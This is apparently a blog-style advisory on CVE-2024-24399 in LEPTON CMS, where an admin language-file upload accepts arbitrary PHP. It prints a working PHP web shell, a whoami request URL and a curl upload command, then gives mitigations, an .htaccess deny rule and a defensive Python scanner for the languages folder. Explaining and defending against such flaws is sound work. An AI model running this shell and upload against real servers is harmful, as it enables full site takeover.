Security researchers have discovered a critical vulnerability: CVE-2024-24399 in LEPTON CMS v7... This flaw allows authenticated attackers to upload arbitrary PHP files via the backend language management feature. If the attacker successfully uploads a malicious PHP file, they can execute commands on the server with the same privileges as the web server process—a classic path to a full website takeover.

This long read will give you an exclusive, easy-to-understand overview of the vulnerability, how it works, and how attackers can exploit it, using clear code examples and links to original disclosures.

What Is LEPTON CMS?

LEPTON is an open-source content management system written in PHP. Popular among small businesses and freelancers, it features backend administration that lets users manage site content, themes, languages, and more.

The Language File Upload

LEPTON v7..'s backend provides an interface for uploading new or updated language files at:
backend/languages/index.php

The intent is for administrators to upload .php files containing localization arrays. However, this upload feature does not properly restrict or sanitize uploaded files. Therefore, an authenticated attacker can upload a PHP script disguised as a language file — and then access and execute it.

Step 1: Logging In

An attacker must first log in as an admin. This narrows the attack surface to insiders or stolen credentials.

Step 2: Navigate to Language Upload

Go to:

http(s)://YOUR_LEPTON_SITE/ADMIN_DIRECTORY/languages/index.php

This area allows uploading .php files.

Step 3: Create a Malicious PHP File (for example, a classic web shell)

<?php
if(isset($_REQUEST['cmd'])) {
    echo '<pre>';
    system($_REQUEST['cmd']);
    echo '</pre>';
}
?>

Step 4: Upload via the Language Interface

Use the backend upload interface to upload evil_language.php.

Once uploaded, the attacker can request:

http(s)://YOUR_LEPTON_SITE/languages/evil_language.php?cmd=whoami

This URL executes the whoami command on the server. The output is rendered back in the browser.

Code Snippet: Exploit Automation (curl)

You can automate this attack using curl if you have an authenticated session (replace COOKIE with your valid session cookie):

curl -k -b "COOKIE=session_id=YOUR_SESSION" \
     -F "userfile=@evil_language.php;type=application/x-php" \
     https://TARGET_SITE/ADMIN_DIRECTORY/languages/index.php

Why Does This Work?

The backend does not move the upload outside the public web root. Because /languages/ is web-accessible and the server hands every .php file in it to the PHP interpreter, the uploaded script runs as soon as it is requested.

- Upgrade: If a patched version is available, update ASAP.
- File Type Validation: Restrict uploads to the expected file types, validating both the filename and the content rather than the extension alone.
- Sanitize & Move: Store uploads outside the web root when possible, and never trust file content.
- Least Privilege: Restrict backend access to trusted users only and enable two-factor authentication.

Example .htaccess (if using Apache), dropped in /languages/. Denying direct HTTP requests does not affect legitimate language files, which the application loads with include() from the filesystem rather than over HTTP; the directive only takes effect if the server's AllowOverride setting permits .htaccess files in that path.

<FilesMatch "\.php$">
    # Apache 2.2 syntax; on Apache 2.4 without mod_access_compat use "Require all denied"
    Deny from all
</FilesMatch>

References & Further Reading

- LEPTON Official Site
- Original Advisory at MITRE (if posted)
- NVD Entry for CVE-2024-24399
- LEPTON Github Repository
- What is a Web Shell? by OWASP

Conclusion

CVE-2024-24399 is a critical vulnerability in LEPTON CMS v7.. that turns an authenticated language file upload into a server-side backdoor. If you use LEPTON, immediately check your version and update. Restrict backend access, audit uploaded files, and secure your server. Attackers need only basic PHP skills and backend access to completely compromise vulnerable sites.

If you’re responsible for a LEPTON deployment, check your /languages/ directory for suspicious files — and patch now!
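A defender-side triage check for the /languages/ audit recommended above and for the "validate the content" mitigation, added here as an example that is not part of the original write-up or of LEPTON itself. It treats a language file as data only (assignments, array(), define()) and flags any file that calls other functions, reads request superglobals, or uses backtick execution; the allow-list, the directory layout and the two sample files are constructed assumptions to tune to your installation.

```python
import os
import re
import tempfile

# Blank out string literals and comments before inspection so that localized
# text such as "ask the system() administrator" cannot cause a false hit.
_STRIP = re.compile(
    r"'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"|/\*.*?\*/|//[^\n]*|#[^\n]*", re.S)
_CALL = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
_SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b")
# Assumed shape of a genuine language file: data and simple guards only.
# Tune this allow-list to what your version's shipped language files use.
_ALLOWED_CALLS = {"array", "define", "defined", "if", "elseif", "isset", "empty"}

def scan_source(src: str) -> list[str]:
    """Return the reasons a PHP language file needs manual review (empty = clean)."""
    code = _STRIP.sub(" ", src)
    reasons = []
    for name in sorted({m.group(1).lower() for m in _CALL.finditer(code)}):
        if name not in _ALLOWED_CALLS:
            reasons.append(f"calls {name}()")
    if _SUPERGLOBAL.search(code):
        reasons.append("reads request data via a superglobal")
    if "`" in code:
        reasons.append("uses backtick shell execution")
    return reasons

def scan_languages_dir(path: str) -> dict[str, list[str]]:
    """Map each suspicious *.php file directly under path to its reasons."""
    findings = {}
    for name in sorted(os.listdir(path)):
        if name.lower().endswith(".php"):
            with open(os.path.join(path, name), encoding="utf-8", errors="replace") as fh:
                reasons = scan_source(fh.read())
            if reasons:
                findings[name] = reasons
    return findings

def build_sample_dir() -> str:
    """Constructed samples (not real LEPTON files): a genuine-looking language
    file and an upload shaped like the web shell in the write-up."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "EN.php"), "w") as fh:
        fh.write("<?php\n$language_code = 'EN';\n$MENU = array('PAGES' => 'Pages');\n"
                 "$TEXT['HELP'] = \"Ask the system() administrator\"; // data only\n")
    with open(os.path.join(d, "evil_language.php"), "w") as fh:
        fh.write("<?php\nif(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }\n")
    return d
```

Run scan_languages_dir() against the real directory and review every flagged file by hand; a clean result from this heuristic is not proof of a clean installation.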

Timeline

Published on: 01/25/2024 21:15:09 UTC
Last modified on: 04/01/2024 04:15:10 UTC